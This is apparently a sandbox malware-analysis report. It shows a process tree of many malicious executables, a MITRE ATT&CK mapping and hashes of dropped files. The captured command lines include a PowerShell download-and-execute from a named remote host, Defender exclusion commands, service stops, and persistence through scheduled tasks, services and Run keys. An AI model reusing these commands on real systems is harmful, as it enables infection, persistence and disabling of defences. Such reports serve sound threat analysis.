  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:6104
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:2916
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:5468
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:6148
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:1328
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:5544
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WSNKISKT"
      4⤵
      Launches sc.exe
      PID:6008
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:6148
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:5600
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:3296
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:3880
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:4904
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WSNKISKT"
      4⤵
      Launches sc.exe
      PID:3880
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:6156
- C:\Users\Admin\AppData\Local\Temp\Files\M5traider.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\M5traider.exe"
  2⤵
  PID:3924
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:4680
- C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\WinlockerBuilderv5.exe"
  2⤵
  PID:4524
- - C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\jusched.exe
    "C:\Users\Admin\AppData\Local\Temp\Microsoft\MyClient\jusched.exe"
    3⤵
    PID:4408
  - - C:\Users\Admin\AppData\Local\Temp\svshost.exe
      "C:\Users\Admin\AppData\Local\Temp\svshost.exe"
      4⤵
      PID:5920
    - - C:\Users\Admin\AppData\Local\Temp\WinlockerBuilderv5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WinlockerBuilderv5.exe"
        5⤵
        
        PID:6216
- - C:\Users\Admin\AppData\Local\Temp\svshost.exe
    "C:\Users\Admin\AppData\Local\Temp\svshost.exe"
    3⤵
    PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\upx_compresser.exe
      "C:\Users\Admin\AppData\Local\Temp\upx_compresser.exe"
      4⤵
      PID:4260
    - - C:\Users\Admin\AppData\Local\Temp\upx_compresser.exe
        
        "C:\Users\Admin\AppData\Local\Temp\upx_compresser.exe"
        5⤵
        
        PID:3120
      - C:\Users\Admin\Documents\AudioDriver\taskhost.exe
        
        "C:\Users\Admin\Documents\AudioDriver\taskhost.exe"
        6⤵
        
        PID:2436
        
        C:\Users\Admin\Documents\AudioDriver\taskhost.exe
        
        "C:\Users\Admin\Documents\AudioDriver\taskhost.exe"
        7⤵
        
        PID:2852
  - - C:\Users\Admin\AppData\Local\Temp\WinlockerBuilderv5.exe
      "C:\Users\Admin\AppData\Local\Temp\WinlockerBuilderv5.exe"
      4⤵
      PID:4176
- C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe"
  2⤵
  PID:3272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
    3⤵
    PID:3412
  - - C:\Windows\system32\mode.com
      mode 65,10
      4⤵
      PID:3820
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e file.zip -p1979614625696244291525413362 -oextracted
      4⤵
      PID:424
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_3.zip -oextracted
      4⤵
      PID:3296
  - - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
      7z.exe e extracted/file_2.zip -oextracted
      4⤵
      PID:6044
- C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
  2⤵
  PID:4588
- C:\Users\Admin\AppData\Local\Temp\Files\SvCpJuhbT.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SvCpJuhbT.exe"
  2⤵
  PID:992
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\SysWOW64\notepad.exe"
    3⤵
    PID:2692
  - - C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe
      "C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe"
      4⤵
      PID:1464
- C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\conhost.exe"
  2⤵
  PID:1356
- C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
  2⤵
  PID:3068
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    3⤵
    PID:3276
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_the_academy';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_the_academy' -Value '"C:\Users\Admin\AppData\Local\Tests_for_preparation_for_the_academy\Tests_for_preparation_for_the_academy.exe"' -PropertyType 'String'
    3⤵
    PID:4612
- C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe"
  2⤵
  PID:5052
- C:\Users\Admin\AppData\Local\Temp\Files\MartDrum.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\MartDrum.exe"
  2⤵
  PID:4348
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k cmd < Tunisia & exit
    3⤵
    PID:2408
  - - C:\Windows\SysWOW64\cmd.exe
      cmd
      4⤵
      PID:4356
- C:\Users\Admin\AppData\Local\Temp\Files\build.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build.exe"
  2⤵
  PID:4764
- - C:\Users\Admin\AppData\Local\Temp\onefile_4764_133510489240551131\stub.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\build.exe"
    3⤵
    PID:592
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:2340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:4036
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3856
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5468
- C:\Users\Admin\AppData\Local\Temp\Files\Gzxzuhejdab.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Gzxzuhejdab.exe"
  2⤵
  PID:4676
- C:\Users\Admin\AppData\Local\Temp\Files\kololl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\kololl.exe"
  2⤵
  PID:2972
- - C:\Users\Admin\AppData\Local\Temp\onefile_2972_133510489297818142\test.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\kololl.exe"
    3⤵
    PID:4140
  - - C:\Users\Admin\AppData\Local\Temp\onefile_2972_133510489297818142\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_2972_133510489297818142\test.exe" "--multiprocessing-fork" "parent_pid=4140" "pipe_handle=648"
      4⤵
      PID:5536
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im brave.exe"
        5⤵
        
        PID:5676
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im brave.exe
        6⤵
        Kills process with taskkill
        
        PID:6132
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im browser.exe"
        5⤵
        
        PID:2880
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im browser.exe
        6⤵
        Kills process with taskkill
        
        PID:6704
  - - C:\Users\Admin\AppData\Local\Temp\onefile_2972_133510489297818142\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_2972_133510489297818142\test.exe" "--multiprocessing-fork" "parent_pid=4140" "pipe_handle=604"
      4⤵
      PID:5528
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im msedge.exe"
        5⤵
        
        PID:5668
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im msedge.exe
        6⤵
        Kills process with taskkill
        
        PID:6136
  - - C:\Users\Admin\AppData\Local\Temp\onefile_2972_133510489297818142\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_2972_133510489297818142\test.exe" "--multiprocessing-fork" "parent_pid=4140" "pipe_handle=600"
      4⤵
      PID:5520
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im opera.exe"
        5⤵
        
        PID:5660
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im opera.exe
        6⤵
        Kills process with taskkill
        
        PID:5872
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im vivaldi.exe"
        5⤵
        
        PID:6152
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im vivaldi.exe
        6⤵
        Kills process with taskkill
        
        PID:6160
  - - C:\Users\Admin\AppData\Local\Temp\onefile_2972_133510489297818142\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_2972_133510489297818142\test.exe" "--multiprocessing-fork" "parent_pid=4140" "pipe_handle=568"
      4⤵
      PID:5512
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im chrome.exe"
        5⤵
        
        PID:5652
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:5124
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:6060
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4288
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:5192
  - - C:\Users\Admin\AppData\Local\Temp\onefile_2972_133510489297818142\test.exe
      "C:\Users\Admin\AppData\Local\Temp\onefile_2972_133510489297818142\test.exe" "--multiprocessing-fork" "parent_pid=4140" "pipe_handle=556"
      4⤵
      PID:5504
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im opera.exe"
        5⤵
        
        PID:5720
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im opera.exe
        6⤵
        Kills process with taskkill
        
        PID:5240
- C:\Users\Admin\AppData\Local\Temp\Files\lololoolll.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lololoolll.exe"
  2⤵
  PID:3456
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5180
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5208
- C:\Users\Admin\AppData\Local\Temp\Files\gold1234.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\gold1234.exe"
  2⤵
  PID:3276
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5148
- C:\Users\Admin\AppData\Local\Temp\Files\donat.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\donat.exe"
  2⤵
  PID:824
- C:\Users\Admin\AppData\Local\Temp\Files\VmManagedSetup.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\VmManagedSetup.exe"
  2⤵
  PID:3720
- C:\Users\Admin\AppData\Local\Temp\Files\fortnite3.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\fortnite3.exe"
  2⤵
  PID:696
- C:\Users\Admin\AppData\Local\Temp\Files\file.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
  2⤵
  PID:5232
- - C:\Windows\System32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')"
    3⤵
    PID:5852
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command IEX(New-Object Net.Webclient).DownloadString('https://maxximbrasil.com/themes/config_20.ps1')
      4⤵
      PID:5296
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\Files\file.exe" >> NUL
    3⤵
    PID:6016
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:7012
- C:\Users\Admin\AppData\Local\Temp\Files\more.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
  2⤵
  PID:5556
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe"
    3⤵
    PID:1204
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UiKVWpFsayx" /XML "C:\Users\Admin\AppData\Local\Temp\tmp98E7.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:5208
- - C:\Users\Admin\AppData\Local\Temp\Files\more.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
    3⤵
    PID:5644
- C:\Users\Admin\AppData\Local\Temp\Files\reo.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\reo.exe"
  2⤵
  PID:5696
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 764
    3⤵
    - Program crash
    PID:3560
- C:\Users\Admin\AppData\Local\Temp\Files\59162d6533d5d56ceedd3f8a24e85e75cd198c72db5719188a4a582752d7fbe4.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\59162d6533d5d56ceedd3f8a24e85e75cd198c72db5719188a4a582752d7fbe4.exe"
  2⤵
  PID:5920
- - C:\Users\Admin\AppData\Local\Temp\Files\59162d6533d5d56ceedd3f8a24e85e75cd198c72db5719188a4a582752d7fbe4.exe
    "{path}"
    3⤵
    PID:6744
- - C:\Users\Admin\AppData\Local\Temp\Files\59162d6533d5d56ceedd3f8a24e85e75cd198c72db5719188a4a582752d7fbe4.exe
    "{path}"
    3⤵
    PID:6760
- C:\Users\Admin\AppData\Local\Temp\Files\kskskfsf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\kskskfsf.exe"
  2⤵
  PID:6112
- C:\Users\Admin\AppData\Local\Temp\Files\Vbsveuhnjb.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Vbsveuhnjb.exe"
  2⤵
  PID:2872
- C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Sharp_1_4.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\StealerClient_Sharp_1_4.exe"
  2⤵
  PID:1148
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 832
    3⤵
    - Program crash
    PID:5400
- C:\Users\Admin\AppData\Local\Temp\Files\v2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\v2.exe"
  2⤵
  PID:1204
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:6288
- C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\VLTKNhatRac.exe"
  2⤵
  PID:5836
- C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe"
  2⤵
  PID:6000
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'build6_unencrypted.exe'
    3⤵
    PID:6800
- C:\Users\Admin\AppData\Local\Temp\Files\sl97_2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\sl97_2.exe"
  2⤵
  PID:6048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
    3⤵
    PID:5704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
    3⤵
    PID:5868
- - C:\Windows\SYSTEM32\schtasks.exe
    schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
    3⤵
    - Creates scheduled task(s)
    PID:872
- - C:\Windows\System\svchost.exe
    "C:\Windows\System\svchost.exe" formal
    3⤵
    PID:4124
- C:\Users\Admin\AppData\Local\Temp\Files\asas.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"
  2⤵
  PID:2680
- - C:\Windows\System32\werfault.exe
    \??\C:\Windows\System32\werfault.exe
    3⤵
    PID:5480
- C:\Users\Admin\AppData\Local\Temp\Files\26a53caa59be5c918cfee530cd39363f8a409033d6c8af51d8f8900aa67acf9a.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\26a53caa59be5c918cfee530cd39363f8a409033d6c8af51d8f8900aa67acf9a.exe"
  2⤵
  PID:5644
- C:\Users\Admin\AppData\Local\Temp\Files\rdxx1.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rdxx1.exe"
  2⤵
  PID:5356
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:7084
- C:\Users\Admin\AppData\Local\Temp\Files\windows.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\windows.exe"
  2⤵
  PID:3064
- C:\Users\Admin\AppData\Local\Temp\Files\swizzy.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\swizzy.exe"
  2⤵
  PID:5260
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5712
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6468
- C:\Users\Admin\AppData\Local\Temp\Files\Screensaver.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Screensaver.exe"
  2⤵
  PID:4684
- C:\Users\Admin\AppData\Local\Temp\Files\south.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\south.exe"
  2⤵
  PID:5472
- C:\Users\Admin\AppData\Local\Temp\Files\goo8.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\goo8.exe"
  2⤵
  PID:3204
- - C:\Users\Admin\AppData\Local\Temp\is-A0GLC.tmp\goo8.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-A0GLC.tmp\goo8.tmp" /SL5="$1049C,7315391,54272,C:\Users\Admin\AppData\Local\Temp\Files\goo8.exe"
    3⤵
    PID:6812
  - - C:\Users\Admin\AppData\Local\MP3_Cutter_Joiner\MP3CutterJoiner.exe
      "C:\Users\Admin\AppData\Local\MP3_Cutter_Joiner\MP3CutterJoiner.exe" -i
      4⤵
      PID:6912
  - - C:\Users\Admin\AppData\Local\MP3_Cutter_Joiner\MP3CutterJoiner.exe
      "C:\Users\Admin\AppData\Local\MP3_Cutter_Joiner\MP3CutterJoiner.exe" -s
      4⤵
      PID:5396
- C:\Users\Admin\AppData\Local\Temp\Files\red.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\red.exe"
  2⤵
  PID:5448
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:7036
- C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\SystemUpdate.exe"
  2⤵
  PID:6400

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2e0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:980

C:\Windows\system32\timeout.exe
timeout 3
1⤵
- Delays execution with timeout.exe
PID:1356

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN buildcosta.exe /TR "C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe" /F
1⤵
- Creates scheduled task(s)
PID:1096

C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"
1⤵
PID:3908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "tasklist"
  2⤵
  PID:4208
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:4496

C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
1⤵
PID:3992

C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
1⤵
PID:6140

C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
C:\Users\Admin\AppData\Local\Temp\Files\buildcosta.exe
1⤵
PID:3736

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:6152

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
PID:6480
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:5568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\Python Config Parser 6.8\Python Config Parser 6.8.exe

Filesize
1.8MB

MD5
393488693746266bbf2b26a59142458e

SHA1
4306d7273f685aa1b00ea8f1a5f687be138f9444

SHA256
419a7aa02325e6f44b279bea3b24c0546de404f206cde03407361029ceb9e103

SHA512
da4f058ca6172d59c7a4cb755207467d2ea2708ac10deda7a5e43a0d77486f8392525103765fe010f600567063fe286b2e6a601bca55341892fb3b7f8820f8fd

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
750KB

MD5
745f2c3a7b134161a9dae64daad61869

SHA1
522b077365795d1700f230de66e71818d20c50fc

SHA256
2c115e03833f0519fd57526b3b1203384d78a38e4edb2e8079d8133fe212e8f3

SHA512
fc97e5cda38a9e8080cb2a806601d274a477170c5396ad9ff68450b680e66daa646f743e3affaa45c5fb2a2b71633b196c83ea17d45e6d64ea9caa25bc403e33

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
228KB

MD5
5b423f688e6820c34945ba0f50b8ca51

SHA1
ee985154563e73bfc7b994aac0dd3e41712bd5c6

SHA256
7b877fd1e8ef63d080aafd289264d3eeace444877f1043f58ce49836a53bd802

SHA512
edc6597cd8c52e0ae029f142b700185c64c662ed50a101f70c5d32df4dd2a779d326ab403bff00e1f3fc0220026bf0edec1db490eafff83d6ed7e3aac2051ef9

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
183KB

MD5
045a8e7633e3d779eac64ede63a867a5

SHA1
05e4eb6ee26855fd8956e495be9800954e66ceae

SHA256
9cab5c1c58a6138cc1b7c41db1c8cde84b0a1ba2176c7a0cb75232457c26dee5

SHA512
6fec70b51bdc99aaebdd1a1ba2e53d93a48c717166d75944a888c36b545dccc757d06a5da60200fde1b0ccbc0e7f5c959b26ed47d13676b0fd3c08b7582b8c6d

Download Submit
C:\ProgramData\mozglue.dll

Filesize
122KB

MD5
5ef72abd595ae0bcb29df6136a29311d

SHA1
034638d297921141d66bdb6e1b53dc49dbf244c2

SHA256
76db43f0e8c6077843fdcf80c9729920b8af5f800e4a187546a4d010845e8296

SHA512
a4ebda3814c7e6b4a244556a7271964ae919811ca2bc3aafde5b51f82a29fadfd8e071127f28a92c141b3bd493d839c829d865410aadaa458d602cdafc3fa339

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000120001\e0cbefcb1af40c7d4aff4aca26621a98.exe

Filesize
57KB

MD5
4914409712dbc5f904a77b41061c843e

SHA1
9f0d6d814686ebfae73d37de8149b9255edade08

SHA256
d3e6739ed5f7c1c951d706e627f58c3be009df5dba58bb4000f6edf90d6e2ba9

SHA512
154cab3b5d0bf7c2e631ff0f1ff599fdea365d7d970063db71ba75d3404db5c53bb817823bdd82692beec24eb96cc82f1eed5e829eaee3f18a9add43086127e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000120001\e0cbefcb1af40c7d4aff4aca26621a98.exe

Filesize
54KB

MD5
eec76cf4166d02328198a4f593b486a8

SHA1
d5effa94b617e997a2e3e98137cd6e599640e7fc

SHA256
d4bd68070be57c8669bd0717833a62507284421dcc11bfc53252ce32a12620e3

SHA512
b6e1cc191e2275d058d1c323c8a96d319b3e37d01d95673e2e399e7fef6720825aca05bd3d33a3bd98051a76887cd840a1a9e020ba4c55aa063e9c5ad9e92929

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000120001\e0cbefcb1af40c7d4aff4aca26621a98.exe

Filesize
7KB

MD5
56bbf101af9765e634ba2872781fb7d1

SHA1
382d1a8df075f992aab5cefd715e78a3d2efaf98

SHA256
b0c6011667d4060aa3165b1d87631b39a070bcd788dcfcacc7bd2849221bfaf3

SHA512
0332e6e70da0b50897df66c65a3a286ada1206f3292d71e347ede35cb56515d432da692c15bcde137e0a1b240a001a1ce210c5c5cacfdc01ec3f9590bfb36a9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000126001\toolspub1.exe

Filesize
64KB

MD5
92960c22c33a9d9173b00265f33595da

SHA1
dcd716da9594b22914ae92b1a1a074536a5e098a

SHA256
fac6431d0fb99037e0d60034347a83aaec56531ed42315c98717d438e02c525d

SHA512
e27b6a22e0386d1c96d7fce88b312a9ab022e0471c351c0025c41f003b79874dca67b368cad148ef4fbe84929cd41251beafbc4deb3717eb0daab201e99a73c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000126001\toolspub1.exe

Filesize
107KB

MD5
